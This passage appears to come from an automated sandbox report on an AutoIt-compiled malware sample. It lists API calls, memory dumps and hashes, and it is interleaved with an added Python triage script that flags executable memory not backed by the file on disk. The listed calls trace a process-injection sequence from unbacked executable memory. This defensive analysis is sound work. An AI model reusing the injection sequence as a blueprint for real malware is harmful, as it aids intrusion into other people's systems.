                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                                          • String ID:
                                                                                          • API String ID: 1792922140-0
                                                                                          • Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                          • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                                          • Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                          • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB

                                                                                          Control-flow Graph

                                                                                          • Graph not reproduced: entry block 040E6090-040E613E (calls 040E3AB0); then 040E6FA0 and CreateFileW, VirtualAlloc, ReadFile, a second VirtualAlloc, 040E71F0 (called from a loop), 040E7000, CloseHandle and VirtualFree at 040E62A0 and 040E637C; the block 040E62AE-040E62B7 branches back to the CreateFileW block.
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 040E6161
                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 040E6387
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1425973237.00000000040E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040E3000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_40e3000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFileFreeVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 204039940-0
                                                                                          • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                          • Instruction ID: 9916d8ec626bfa4fdffa6c1e8578ad85a9e8522db0589151e369ad6a8aa8f9b1
                                                                                          • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                          • Instruction Fuzzy Hash: 26A11570E00208EFDB14CFA5D894BEEBBB5BF58304F208959E501BB281D776AA51CB95
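This function is the only one in the section whose dump is marked "based on PE: false": it runs from a region at 040E3000 that no image on disk backs, and it opens a file, allocates memory and reads into it. Pulling exactly those regions out of a report is the first triage step, and the script below does it for the dump names listed on this page. It is an added example, not part of the Joe Sandbox report. The field layout it decodes (fourth field = base address, fifth = Win32 PAGE_* protection, seventh = MEM_* region type) is an assumption inferred from the names on this page: the dumps marked "based on PE: true" carry 0x01000000 (MEM_IMAGE) in the seventh field and 0x02, 0x04 or 0x20 in the fifth, while the one marked "based on PE: false" carries 0x00020000 (MEM_PRIVATE) and 0x40. The PAGE_* and MEM_* constants are the standard Win32 values; the remaining fields are left undecoded.

```python
"""Triage of the memory-dump regions listed in this report.

Added example, not part of the Joe Sandbox report. The dump names have the shape
<a>.<b>.<timestamp>.<base>.<protect>.<c>.<type>.<d>.sdmp; the decoding of fields
4, 5 and 7 below is an assumption inferred from the names on the page (see the
lead-in), the PAGE_* and MEM_* constants are standard Win32 values.
"""
from __future__ import annotations
from dataclasses import dataclass

PAGE_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_EXECUTE_ANY = 0x10 | 0x20 | 0x40 | 0x80
MEM_IMAGE = 0x01000000
MEM_NAMES = {MEM_IMAGE: "MEM_IMAGE", 0x00040000: "MEM_MAPPED", 0x00020000: "MEM_PRIVATE"}

# Dump names exactly as listed in the report's "Memory Dump Source" entries.
REPORT_DUMPS = [
    "00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1425973237.00000000040E3000.00000040.00000020.00020000.00000000.sdmp",
]


@dataclass(frozen=True)
class DumpRegion:
    name: str
    base: int
    protect: int      # low byte of the PAGE_* value; PAGE_GUARD/PAGE_NOCACHE modifiers stripped
    mem_type: int

    @property
    def executable(self) -> bool:
        return bool(self.protect & PAGE_EXECUTE_ANY)

    @property
    def image_backed(self) -> bool:
        return self.mem_type == MEM_IMAGE

    @property
    def suspicious(self) -> bool:
        # Executable memory that no PE on disk backs: unpacked or injected code.
        return self.executable and not self.image_backed


def parse_dump_name(name: str) -> DumpRegion:
    """Decode one .sdmp file name under the assumed field layout; reject other shapes."""
    stem = name[:-len(".sdmp")] if name.endswith(".sdmp") else name
    fields = stem.split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected dump name layout: {name!r}")
    return DumpRegion(
        name=name,
        base=int(fields[3], 16),
        protect=int(fields[4], 16) & 0xFF,
        mem_type=int(fields[6], 16),
    )


def describe(region: DumpRegion) -> str:
    """One-line summary: base, protection name, region type, and a SUSPICIOUS flag."""
    prot = PAGE_NAMES.get(region.protect, f"0x{region.protect:02X}")
    kind = MEM_NAMES.get(region.mem_type, f"0x{region.mem_type:08X}")
    flag = " SUSPICIOUS" if region.suspicious else ""
    return f"0x{region.base:08X} {prot} {kind}{flag}"


def triage(names: list[str]) -> list[DumpRegion]:
    """Regions worth pulling first: executable and not image-backed."""
    return [r for r in map(parse_dump_name, names) if r.suspicious]


if __name__ == "__main__":
    for region in map(parse_dump_name, REPORT_DUMPS):
        print(describe(region))
```

Running it over the names on this page flags only the 040E3000 region (PAGE_EXECUTE_READWRITE, MEM_PRIVATE), which is the dump to carve and scan for the injected payload first; the 00400000-004AB000 dumps all decode as MEM_IMAGE and map to sections of the file on disk.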

                                                                                          Control-flow Graph

                                                                                          • Graph not reproduced: entry block 00414F10-00414F2C; the function calls 00417F23, 00417EBB, 004131F0, 0041E6B1, 0041EE9B, 0041453A and 0041ED9E; no imported API appears in the graph.
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                          • String ID:
                                                                                          • API String ID: 3886058894-0
                                                                                          • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                          • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                                                                          • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                          • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99

Control-flow Graph
• Rendered graph not extracted. Basic blocks: 401be0-401bf5; 401bfb-401c12 (call 4013a0); 401c18-401c34 (call 4021e0); 401c3a-401c3e; 401c44-401c4e (call 40d3b0); 401c53-401cd9 (call 4131f0, 41326a, 411691, Shell_NotifyIconW, 402620); 401cde-401ce3; 42a9a0-42a9b0 (LoadStringW); 42a9bb-42a9c8 (call 40df50); 42a9cd-42a9ea (call 40d3b0, 437a81); 42a9f0-42aa04 (call 40d3b0, 437a81)
APIs
• LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• _memset.LIBCMT ref: 00401C62
• _wcsncpy.LIBCMT ref: 00401CA1
• _wcscpy.LIBCMT ref: 00401CBD
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
• String ID: Line:
• API String ID: 1620655955-1585850449
• Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
• Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
• Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
• Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B

Control-flow Graph
• Rendered graph not extracted. Single basic block 4103e0-410461 (CreateWindowExW * 2, ShowWindow * 2)
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
• ShowWindow.USER32(?,00000000), ref: 00410454
• ShowWindow.USER32(?,00000000), ref: 0041045E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
• Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
• Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
• Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C

Control-flow Graph
• Rendered graph not extracted. Basic blocks: 40e5e60-40e5f85 (call 40e3ab0, 40e5d50; CreateFileW); 40e5f87; 40e5f8c-40e5f9c; 40e5f9e; 40e5fa3-40e5fbd (VirtualAlloc); 40e5fbf; 40e5fc1-40e5fd8 (ReadFile); 40e5fda; 40e5fdc-40e6016 (call 40e5d90, 40e4d50); 40e6018-40e602d (call 40e5de0); 40e6032-40e603a (ExitProcess); 40e603c-40e6041
APIs
  • Part of subcall function 040E5D50: Sleep.KERNELBASE(000001F4), ref: 040E5D61
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 040E5F7B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1425973237.00000000040E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040E3000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40e3000_XhAQ0Rk63O.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: 4QHVKI9OX6
• API String ID: 2694422964-646440272
• Opcode ID: 81b89d58bc279ea081a69ad5cbf2466cfb8b88e4dfaad5ba2c0efd62c36e63f7
• Instruction ID: bc3e4ffd77de1c0122be9cb08d3e0771e83628bb09ea5b1c12d7a7a9f1eccca5
• Opcode Fuzzy Hash: 81b89d58bc279ea081a69ad5cbf2466cfb8b88e4dfaad5ba2c0efd62c36e63f7
• Instruction Fuzzy Hash: 66518E30D04248EBEF14DBE4D814BEFBB79AF58304F004599E608BB2C0DA796B44CBA5
APIs
• __lock.LIBCMT ref: 00413AA6
  • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
  • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
  • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
• ___sbh_find_block.LIBCMT ref: 00413AB1
• ___sbh_free_block.LIBCMT ref: 00413AC0
• RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
• GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
• String ID:
• API String ID: 2714421763-0
• Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
• Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
• Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
• Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID:
• String ID: Wu
• API String ID: 0-4083010176
• Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
• Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
• Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
• Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
APIs
  • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
  • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
  • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
• _strcat.LIBCMT ref: 0040F603
  • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
  • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
• String ID: HH
• API String ID: 1194219731-2761332787
• Opcode ID: ee47fd20779ff5886c3c730aa44a1efa7791f275b5868e90dcef310a8da63108
• Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
• Opcode Fuzzy Hash: ee47fd20779ff5886c3c730aa44a1efa7791f275b5868e90dcef310a8da63108
• Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 040E550B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040E55A1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040E55C3
Memory Dump Source
• Source File: 00000000.00000002.1425973237.00000000040E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040E3000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40e3000_XhAQ0Rk63O.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
• Instruction ID: a5f8423348b212de0c7ef67028bab4079f442be720f6b68d013472e58747c1c9
• Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
• Instruction Fuzzy Hash: 72621B30A14258DBEB24CFA4CC50BEEB376EF58304F1095A9D10DFB290E675AE91CB59
APIs
• _memset.LIBCMT ref: 0040E202
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID: IconNotifyShell__memset
• String ID:
• API String ID: 928536360-0
• Opcode ID: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
• Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
• Opcode Fuzzy Hash: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
• Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
APIs
• _malloc.LIBCMT ref: 00411734
  • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
  • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
• std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
• std::bad_exception::bad_exception.LIBCMT ref: 0041176B
• __CxxThrowException@8.LIBCMT ref: 00411779
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
• String ID:
• API String ID: 1411284514-0
• Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
• Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
• Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
• Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                                                          APIs
                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                                          • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3677997916-0
                                                                                          • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                          • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                                          • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                          • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                                          APIs
                                                                                          • _malloc.LIBCMT ref: 00435278
                                                                                            • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                            • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                            • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                          • _malloc.LIBCMT ref: 00435288
                                                                                          • _malloc.LIBCMT ref: 00435298
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _malloc$AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 680241177-0
                                                                                          • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                          • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                                                                                          • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                          • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 00401B71
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                            • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                            • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                            • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                          • String ID: @EXITCODE
                                                                                          • API String ID: 580348202-3436989551
                                                                                          • Opcode ID: 4145ab2d07bf19a354fff2d5031cf88e997e0915ee9c5273387e54f5573defd1
                                                                                          • Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
                                                                                          • Opcode Fuzzy Hash: 4145ab2d07bf19a354fff2d5031cf88e997e0915ee9c5273387e54f5573defd1
                                                                                          • Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
